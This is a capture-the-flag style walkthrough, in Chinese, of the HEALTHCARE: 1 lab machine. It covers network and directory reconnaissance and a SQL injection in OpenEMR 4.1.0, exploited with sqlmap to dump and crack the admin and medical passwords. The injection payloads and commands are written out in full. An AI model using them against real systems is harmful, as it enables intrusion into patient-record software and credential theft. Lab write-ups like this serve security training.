红队打靶练习:HEALTHCARE: 1

news2024/11/15 22:58:32

目录

信息收集

1、arp

2、nmap

3、nikto

4、whatweb

目录探测

1、gobuster

2、dirsearch

WEB

web信息收集

gobuster

cms

sqlmap

爆库

爆表

爆列

爆字段

FTP

提权

信息收集

本地提权

信息收集

1、arp
┌──(root㉿ru)-[~/kali]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:69:c7:bf, IPv4: 192.168.110.128
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.110.1   00:50:56:c0:00:08       VMware, Inc.
192.168.110.2   00:50:56:ec:d1:ca       VMware, Inc.
192.168.110.149 00:50:56:38:b0:1e       VMware, Inc.
192.168.110.254 00:50:56:ff:50:cf       VMware, Inc.

5 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.369 seconds (108.06 hosts/sec). 4 responded

2、nmap
端口探测

┌──(root㉿ru)-[~/kali]
└─# nmap -p- 192.168.110.149 --min-rate 10000 -oA portD
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-05 08:43 CST
Nmap scan report for 192.168.110.149
Host is up (0.0012s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
21/tcp open  ftp
80/tcp open  http
MAC Address: 00:50:56:38:B0:1E (VMware)

Nmap done: 1 IP address (1 host up) scanned in 7.34 seconds


信息探测

┌──(root㉿ru)-[~/kali]
└─# nmap -sCV -O -Pn -p 21,80 192.168.110.149 --min-rate 10000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-05 08:44 CST
Nmap scan report for 192.168.110.149
Host is up (0.00026s latency).

PORT   STATE SERVICE VERSION
21/tcp open  ftp     ProFTPD 1.3.3d
80/tcp open  http    Apache httpd 2.2.17 ((PCLinuxOS 2011/PREFORK-1pclos2011))
|_http-server-header: Apache/2.2.17 (PCLinuxOS 2011/PREFORK-1pclos2011)
|_http-title: Coming Soon 2
| http-robots.txt: 8 disallowed entries
| /manual/ /manual-2.2/ /addon-modules/ /doc/ /images/
|_/all_our_e-mail_addresses /admin/ /
MAC Address: 00:50:56:38:B0:1E (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|WAP|media device|phone
Running (JUST GUESSING): Linux 2.6.X|3.X|2.4.X (99%), ZyXEL embedded (93%), Osmosys embedded (93%), Ubee embedded (93%), Arris embedded (93%), Linksys embedded (93%), Denon embedded (93%), Google Android 4.0.X (93%)
OS CPE: cpe:/o:linux:linux_kernel:2.6.38 cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:2.4.32 cpe:/h:ubee:evw3226 cpe:/h:arris:tg1672 cpe:/h:arris:tg862g cpe:/h:linksys:wrv54g cpe:/o:google:android:4.0.4
Aggressive OS guesses: Linux 2.6.38 (99%), Linux 2.6.32 - 3.5 (98%), Linux 2.6.38 - 3.0 (97%), Linux 2.6.37 (96%), Linux 2.6.9 - 2.6.30 (96%), Linux 2.6.32 - 3.10 (96%), Linux 2.6.18 - 2.6.32 (95%), OpenWrt (Linux 2.4.32) (95%), Linux 2.6.22 (Fedora Core 6) (94%), Linux 2.6.27 - 2.6.28 (94%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: OS: Unix

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.50 seconds


3、nikto
┌──(root㉿ru)-[~/kali]
└─# nikto -h http://192.168.110.149
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP:          192.168.110.149
+ Target Hostname:    192.168.110.149
+ Target Port:        80
+ Start Time:         2024-02-05 08:45:12 (GMT8)
---------------------------------------------------------------------------
+ Server: Apache/2.2.17 (PCLinuxOS 2011/PREFORK-1pclos2011)
+ /: Server may leak inodes via ETags, header found with file /, inode: 264154, size: 5031, mtime: Sat Jan  6 14:21:38 2018. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1418
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ /robots.txt: contains 8 entries which should be manually viewed. See: https://developer.mozilla.org/en-US/docs/Glossary/Robots.txt
+ /index: Uncommon header 'tcn' found, with contents: list.
+ /index: Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. The following alternatives for 'index' were found: index.html. See: http://www.wisec.it/sectou.php?id=4698ebdc59d15,https://exchange.xforce.ibmcloud.com/vulnerabilities/8275
+ Apache/2.2.17 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ OPTIONS: Allowed HTTP Methods: GET, HEAD, POST, OPTIONS .
+ /cgi-bin/test.cgi: Site appears vulnerable to the 'shellshock' vulnerability. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271
+ /cgi-bin/test.cgi: This might be interesting.
+ /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
+ /#wp-config.php#: #wp-config.php# file found. This file contains the credentials.
+ 9724 requests: 0 error(s) and 12 item(s) reported on remote host
+ End Time:           2024-02-05 08:45:35 (GMT8) (23 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

4、whatweb
┌──(root㉿ru)-[~/kali]
└─# whatweb http://192.168.110.149/
http://192.168.110.149/ [200 OK] Apache[2.2.17], Bootstrap, Country[RESERVED][ZZ], Email[ex@abc.xyz], HTML5, HTTPServer[PCLinuxOS][Apache/2.2.17 (PCLinuxOS 2011/PREFORK-1pclos2011)], IP[192.168.110.149], JQuery[3.2.1], Script, Title[Coming Soon 2]

目录探测

1、gobuster
┌──(root㉿ru)-[~/kali]
└─# gobuster dir -u http://192.168.110.149/ -x php,txt,html -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.110.149/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php,txt,html
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.html           (Status: 200) [Size: 5031]
/.html                (Status: 403) [Size: 1001]
/index                (Status: 200) [Size: 5031]
/images               (Status: 301) [Size: 346] [--> http://192.168.110.149/images/]
/css                  (Status: 301) [Size: 343] [--> http://192.168.110.149/css/]
/js                   (Status: 301) [Size: 342] [--> http://192.168.110.149/js/]
/vendor               (Status: 301) [Size: 346] [--> http://192.168.110.149/vendor/]
/favicon              (Status: 200) [Size: 1406]
/robots               (Status: 200) [Size: 620]
/robots.txt           (Status: 200) [Size: 620]
/fonts                (Status: 301) [Size: 345] [--> http://192.168.110.149/fonts/]
/.html                (Status: 403) [Size: 1001]
/gitweb               (Status: 301) [Size: 346] [--> http://192.168.110.149/gitweb/]
/server-status        (Status: 403) [Size: 1001]
/phpMyAdmin           (Status: 403) [Size: 59]
Progress: 882240 / 882244 (100.00%)
===============================================================
Finished
===============================================================

2、dirsearch
┌──(root㉿ru)-[~/kali]
└─# dirsearch -u http://192.168.110.149 -e* -x 403
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, jsp, asp, aspx, do, action, cgi, html, htm, js, tar.gz | HTTP method: GET | Threads: 25 | Wordlist size: 14594

Output File: /root/kali/reports/http_192.168.110.149/_24-02-05_08-47-05.txt

Target: http://192.168.110.149/

[08:47:05] Starting:
[08:47:06] 301 -  342B  - /js  ->  http://192.168.110.149/js/
[08:47:50] 200 -    1KB - /cgi-bin/test.cgi
[08:47:58] 301 -  343B  - /css  ->  http://192.168.110.149/css/
[08:48:06] 200 -    1KB - /favicon.ico
[08:48:08] 301 -  345B  - /fonts  ->  http://192.168.110.149/fonts/
[08:48:14] 301 -  346B  - /images  ->  http://192.168.110.149/images/
[08:48:47] 200 -  620B  - /robots.txt

Task Completed

WEB

web信息收集




发现这些新索不难串联到一起!我们似乎遗漏了什么东西!我们重新进行目录扫描!这次我们换一个字典!

gobuster
┌──(root㉿ru)-[~/kali]
└─# gobuster dir -u http://192.168.110.149/ -x php,txt,html -w /root/kali/1.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.110.149/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /root/kali/1.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php,txt,html
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index                (Status: 200) [Size: 5031]
/openemr              (Status: 301) [Size: 347] [--> http://192.168.110.149/openemr/]
/.html                (Status: 403) [Size: 1001]
/images               (Status: 301) [Size: 346] [--> http://192.168.110.149/images/]
/index.html           (Status: 200) [Size: 5031]
/css                  (Status: 301) [Size: 343] [--> http://192.168.110.149/css/]
/js                   (Status: 301) [Size: 342] [--> http://192.168.110.149/js/]
/vendor               (Status: 301) [Size: 346] [--> http://192.168.110.149/vendor/]
/favicon              (Status: 200) [Size: 1406]
/robots               (Status: 200) [Size: 620]
/robots.txt           (Status: 200) [Size: 620]
/fonts                (Status: 301) [Size: 345] [--> http://192.168.110.149/fonts/]
Progress: 29292 / 882248 (3.32%)^C
[!] Keyboard interrupt detected, terminating.
Progress: 29980 / 882248 (3.40%)
===============================================================
Finished
===============================================================

字典去github下载!

我们发现扫描到一个新目录!/openemr

cms


是一个cms,OpenEMR v4.1.0   我们使用searchsploit搜索一下


存在两个漏洞!我们都下载下来进行分析!

┌──(root㉿ru)-[~/kali]
└─# cat 17998.txt
# Exploit Title: [Openemr-4.1.0 SQL injection Vulnerability]
# Date: [2011/10/18]
# Author: [I2sec-dae jin Oh]
# Software Link: [http://sourceforge.net/projects/openemr/files/OpenEMR%20Current/4.1.0/openemr-4.1.0.zip/download]
# Vendor : www.open-emr.com
# Version: [Openemr-4.1.0]
# Tested on: [Windows 7]
---------------------------------------
source of : /interface/patient_file/summary/add_edit_issue.php:

$irow = array();
if ($issue)
$irow = sqlQuery("SELECT * FROM lists WHERE id = $issue");; <--------------------- SQL injection
else if ($thistype)
$irow['type'] = $thistype
proof of concept:
http://[attack url]/interface/patient_file/summary/add_edit_issue.php?issue=0+union
+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,user(),25,26,27--

通过漏洞我们了解到,这个版本的cms似乎存在sql注入漏洞!我们使用sqlmap进行探测!

sqlmap


登陆包!http://192.168.110.149/openemr/interface/login/validateUser.php?u=1


爆库

┌──(root㉿ru)-[~/kali]
└─# sqlmap -u "http://192.168.110.149/openemr/interface/login/validateUser.php?u=1" --dbs --batch
        ___
       __H__
 ___ ___[(]_____ ___ ___  {1.7.12#stable}
|_ -| . [.]     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 09:35:54 /2024-02-05/

[09:35:54] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('OpenEMR=ab4cee0fe50...6731f54cdf'). Do you want to use those [Y/n] Y
[09:35:54] [INFO] testing if the target URL content is stable
[09:35:55] [ERROR] there was an error checking the stability of page because of lack of content. Please check the page request results (and probable errors) by using higher verbosity levels
[09:35:55] [INFO] testing if GET parameter 'u' is dynamic
[09:35:55] [WARNING] GET parameter 'u' does not appear to be dynamic
[09:35:55] [INFO] heuristic (basic) test shows that GET parameter 'u' might be injectable (possible DBMS: 'MySQL')
[09:35:55] [INFO] heuristic (XSS) test shows that GET parameter 'u' might be vulnerable to cross-site scripting (XSS) attacks
[09:35:55] [INFO] testing for SQL injection on GET parameter 'u'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
[09:35:55] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[09:35:55] [WARNING] reflective value(s) found and filtering out
[09:35:55] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[09:35:55] [INFO] testing 'Generic inline queries'
[09:35:55] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[09:35:55] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[09:35:56] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)'
[09:35:56] [INFO] GET parameter 'u' appears to be 'OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)' injectable
[09:35:56] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[09:35:56] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[09:35:56] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[09:35:56] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[09:35:56] [INFO] testing 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)'
[09:35:56] [INFO] testing 'MySQL >= 5.6 OR error-based - WHERE or HAVING clause (GTID_SUBSET)'
[09:35:56] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[09:35:56] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[09:35:56] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[09:35:56] [INFO] GET parameter 'u' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable
[09:35:56] [INFO] testing 'MySQL inline queries'
[09:35:56] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[09:35:56] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[09:35:56] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[09:35:56] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[09:35:56] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK - comment)'
[09:35:56] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK)'
[09:35:56] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[09:36:06] [INFO] GET parameter 'u' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
[09:36:06] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[09:36:06] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[09:36:06] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[09:36:06] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[09:36:06] [INFO] target URL appears to have 2 columns in query
do you want to (re)try to find proper UNION column types with fuzzy test? [y/N] N
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] Y
[09:36:06] [WARNING] if UNION based SQL injection is not detected, please consider forcing the back-end DBMS (e.g. '--dbms=mysql')
[09:36:06] [INFO] target URL appears to be UNION injectable with 2 columns
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] Y
[09:36:06] [INFO] testing 'MySQL UNION query (39) - 21 to 40 columns'
[09:36:06] [INFO] testing 'MySQL UNION query (39) - 41 to 60 columns'
[09:36:07] [INFO] testing 'MySQL UNION query (39) - 61 to 80 columns'
[09:36:07] [INFO] testing 'MySQL UNION query (39) - 81 to 100 columns'
[09:36:07] [WARNING] in OR boolean-based injection cases, please consider usage of switch '--drop-set-cookie' if you experience any problems during data retrieval
[09:36:07] [WARNING] parameter length constraining mechanism detected (e.g. Suhosin patch). Potential problems in enumeration phase can be expected
GET parameter 'u' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 280 HTTP(s) requests:
---
Parameter: u (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
    Payload: u=1' OR NOT 7179=7179#

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: u=1' AND (SELECT 4288 FROM(SELECT COUNT(*),CONCAT(0x7162766b71,(SELECT (ELT(4288=4288,1))),0x71626a6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- eMKb

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: u=1' AND (SELECT 1359 FROM (SELECT(SLEEP(5)))TmNP)-- McSc
---
[09:36:07] [INFO] the back-end DBMS is MySQL
web server operating system: Linux
web application technology: Apache 2.2.17, PHP 5.3.3
back-end DBMS: MySQL >= 5.0
[09:36:07] [INFO] fetching database names
[09:36:07] [INFO] retrieved: 'information_schema'
[09:36:07] [INFO] retrieved: 'openemr'
[09:36:07] [INFO] retrieved: 'test'
available databases [3]:
[*] information_schema
[*] openemr
[*] test

[09:36:07] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.110.149'

[*] ending @ 09:36:07 /2024-02-05/

从以上信息可以看出,该cms存在布尔盲注、报错注入、时间注入!

爆表
┌──(root㉿ru)-[~/kali]
└─# sqlmap -u "http://192.168.110.149/openemr/interface/login/validateUser.php?u=1" --batch -D openemr --tables
        ___
       __H__
 ___ ___[)]_____ ___ ___  {1.7.12#stable}
|_ -| . [(]     | .'| . |
|___|_  [.]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 09:38:50 /2024-02-05/

[09:38:50] [INFO] resuming back-end DBMS 'mysql'
[09:38:50] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('OpenEMR=656c12b2c0e...f14efd3fd5'). Do you want to use those [Y/n] Y
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: u (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
    Payload: u=1' OR NOT 7179=7179#

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: u=1' AND (SELECT 4288 FROM(SELECT COUNT(*),CONCAT(0x7162766b71,(SELECT (ELT(4288=4288,1))),0x71626a6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- eMKb

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: u=1' AND (SELECT 1359 FROM (SELECT(SLEEP(5)))TmNP)-- McSc
---
Database: openemr
[141 tables]
+---------------------------------+
| array                           |
| groups                          |
| log                             |
| version                         |
| addresses                       |
| amc_misc_data                   |
| ar_activity                     |
| ar_session                      |
| audit_details                   |
| audit_master                    |
| automatic_notification          |
| batchcom                        |
| billing                         |
| categories                      |
| categories_seq                  |
| categories_to_documents         |
| chart_tracker                   |
| claims                          |
| clinical_plans                  |
| clinical_plans_rules            |
| clinical_rules                  |
| code_types                      |
| codes                           |
| config                          |
| config_seq                      |
| customlists                     |
| documents                       |
| documents_legal_categories      |
| documents_legal_detail          |
| documents_legal_master          |
| drug_inventory                  |
| drug_sales                      |
| drug_templates                  |
| drugs                           |
| eligibility_response            |
| eligibility_verification        |
| employer_data                   |
| enc_category_map                |
| extended_log                    |
| facility                        |
| fee_sheet_options               |
| form_dictation                  |
| form_encounter                  |
| form_misc_billing_options       |
| form_reviewofs                  |
| form_ros                        |
| form_soap                       |
| form_vitals                     |
| forms                           |
| gacl_acl                        |
| gacl_acl_sections               |
| gacl_acl_seq                    |
| gacl_aco                        |
| gacl_aco_map                    |
| gacl_aco_sections               |
| gacl_aco_sections_seq           |
| gacl_aco_seq                    |
| gacl_aro                        |
| gacl_aro_groups                 |
| gacl_aro_groups_id_seq          |
| gacl_aro_groups_map             |
| gacl_aro_map                    |
| gacl_aro_sections               |
| gacl_aro_sections_seq           |
| gacl_aro_seq                    |
| gacl_axo                        |
| gacl_axo_groups                 |
| gacl_axo_groups_map             |
| gacl_axo_map                    |
| gacl_axo_sections               |
| gacl_groups_aro_map             |
| gacl_groups_axo_map             |
| gacl_phpgacl                    |
| geo_country_reference           |
| geo_zone_reference              |
| globals                         |
| gprelations                     |
| history_data                    |
| immunizations                   |
| insurance_companies             |
| insurance_data                  |
| insurance_numbers               |
| integration_mapping             |
| issue_encounter                 |
| lang_constants                  |
| lang_custom                     |
| lang_definitions                |
| lang_languages                  |
| layout_options                  |
| lbf_data                        |
| list_options                    |
| lists                           |
| lists_touch                     |
| notes                           |
| notification_log                |
| notification_settings           |
| onotes                          |
| openemr_module_vars             |
| openemr_modules                 |
| openemr_postcalendar_categories |
| openemr_postcalendar_events     |
| openemr_postcalendar_limits     |
| openemr_postcalendar_topics     |
| openemr_session_info            |
| patient_access_offsite          |
| patient_access_onsite           |
| patient_data                    |
| patient_reminders               |
| payments                        |
| pharmacies                      |
| phone_numbers                   |
| pma_bookmark                    |
| pma_column_info                 |
| pma_history                     |
| pma_pdf_pages                   |
| pma_relation                    |
| pma_table_coords                |
| pma_table_info                  |
| pnotes                          |
| prescriptions                   |
| prices                          |
| procedure_order                 |
| procedure_report                |
| procedure_result                |
| procedure_type                  |
| registry                        |
| rule_action                     |
| rule_action_item                |
| rule_filter                     |
| rule_patient_data               |
| rule_reminder                   |
| rule_target                     |
| sequences                       |
| standardized_tables_track       |
| syndromic_surveillance          |
| template_users                  |
| transactions                    |
| user_settings                   |
| users                           |
| users_facility                  |
| x12_partners                    |
+---------------------------------+

[09:38:52] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.110.149'

[*] ending @ 09:38:52 /2024-02-05/

爆列
┌──(root㉿ru)-[~/kali]
└─# sqlmap -u "http://192.168.110.149/openemr/interface/login/validateUser.php?u=1" --batch -D openemr -T users --columns
        ___
       __H__
 ___ ___[(]_____ ___ ___  {1.7.12#stable}
|_ -| . [)]     | .'| . |
|___|_  [.]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 09:39:15 /2024-02-05/

[09:39:16] [INFO] resuming back-end DBMS 'mysql'
[09:39:16] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('OpenEMR=66d022dcc84...e0539bd15f'). Do you want to use those [Y/n] Y
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: u (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
    Payload: u=1' OR NOT 7179=7179#

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: u=1' AND (SELECT 4288 FROM(SELECT COUNT(*),CONCAT(0x7162766b71,(SELECT (ELT(4288=4288,1))),0x71626a6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- eMKb

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: u=1' AND (SELECT 1359 FROM (SELECT(SLEEP(5)))TmNP)-- McSc
---
Database: openemr
Table: users
[53 columns]
+----------------------+--------------+
| Column               | Type         |
+----------------------+--------------+
| active               | tinyint(1)   |
| organization         | varchar(255) |
| source               | tinyint(4)   |
| url                  | varchar(255) |
| abook_type           | varchar(31)  |
| assistant            | varchar(255) |
| authorized           | tinyint(4)   |
| billname             | varchar(255) |
| cal_ui               | tinyint(4)   |
| calendar             | tinyint(1)   |
| city                 | varchar(30)  |
| city2                | varchar(30)  |
| default_warehouse    | varchar(31)  |
| email                | varchar(255) |
| facility             | varchar(255) |
| facility_id          | int(11)      |
| fax                  | varchar(30)  |
| federaldrugid        | varchar(255) |
| federaltaxid         | varchar(255) |
| fname                | varchar(255) |
| id                   | bigint(20)   |
| info                 | longtext     |
| irnpool              | varchar(31)  |
| lname                | varchar(255) |
| mname                | varchar(255) |
| newcrop_user_role    | varchar(30)  |
| notes                | text         |
| npi                  | varchar(15)  |
| password             | longtext     |
| phone                | varchar(30)  |
| phonecell            | varchar(30)  |
| phonew1              | varchar(30)  |
| phonew2              | varchar(30)  |
| pwd_expiration_date  | date         |
| pwd_history1         | longtext     |
| pwd_history2         | longtext     |
| see_auth             | int(11)      |
| specialty            | varchar(255) |
| ssi_relayhealth      | varchar(64)  |
| state                | varchar(30)  |
| state2               | varchar(30)  |
| state_license_number | varchar(25)  |
| street               | varchar(60)  |
| street2              | varchar(60)  |
| streetb              | varchar(60)  |
| streetb2             | varchar(60)  |
| taxonomy             | varchar(30)  |
| title                | varchar(30)  |
| upin                 | varchar(255) |
| username             | varchar(255) |
| valedictory          | varchar(255) |
| zip                  | varchar(20)  |
| zip2                 | varchar(20)  |
+----------------------+--------------+

[09:39:17] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.110.149'

[*] ending @ 09:39:17 /2024-02-05/


爆字段
┌──(root㉿ru)-[~/kali]
└─# sqlmap -u "http://192.168.110.149/openemr/interface/login/validateUser.php?u=1" --batch -D openemr -T users -C username,password --dump
        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.7.12#stable}
|_ -| . [,]     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 09:39:49 /2024-02-05/

[09:39:50] [INFO] resuming back-end DBMS 'mysql'
[09:39:50] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('OpenEMR=9ed6766ab33...4397ff53ff'). Do you want to use those [Y/n] Y
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: u (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
    Payload: u=1' OR NOT 7179=7179#

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: u=1' AND (SELECT 4288 FROM(SELECT COUNT(*),CONCAT(0x7162766b71,(SELECT (ELT(4288=4288,1))),0x71626a6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- eMKb

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: u=1' AND (SELECT 1359 FROM (SELECT(SLEEP(5)))TmNP)-- McSc
---
[09:39:50] [INFO] the back-end DBMS is MySQL
web server operating system: Linux
web application technology: PHP 5.3.3, Apache 2.2.17
back-end DBMS: MySQL >= 5.0
[09:39:50] [INFO] fetching entries of column(s) 'password,username' for table 'users' in database 'openemr'
[09:39:50] [WARNING] reflective value(s) found and filtering out
[09:39:50] [INFO] retrieved: '3863efef9ee2bfbc51ecdca359c6302bed1389e8'
[09:39:50] [INFO] retrieved: 'admin'
[09:39:50] [INFO] retrieved: 'ab24aed5a7c4ad45615cd7e0da816eea39e4895d'
[09:39:50] [INFO] retrieved: 'medical'
[09:39:50] [INFO] recognized possible password hashes in column 'password'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] N
do you want to crack them via a dictionary-based attack? [Y/n/q] Y
[09:39:50] [INFO] using hash method 'sha1_generic_passwd'
what dictionary do you want to use?
[1] default dictionary file '/usr/share/sqlmap/data/txt/wordlist.tx_' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
> 1
[09:39:50] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N] N
[09:39:50] [INFO] starting dictionary-based cracking (sha1_generic_passwd)
[09:39:50] [INFO] starting 2 processes
[09:39:57] [INFO] cracked password 'ackbar' for user 'admin'
[09:40:07] [INFO] cracked password 'medical' for user 'medical'
Database: openemr
Table: users
[2 entries]
+----------+----------------------------------------------------+
| username | password                                           |
+----------+----------------------------------------------------+
| admin    | 3863efef9ee2bfbc51ecdca359c6302bed1389e8 (ackbar)  |
| medical  | ab24aed5a7c4ad45615cd7e0da816eea39e4895d (medical) |
+----------+----------------------------------------------------+

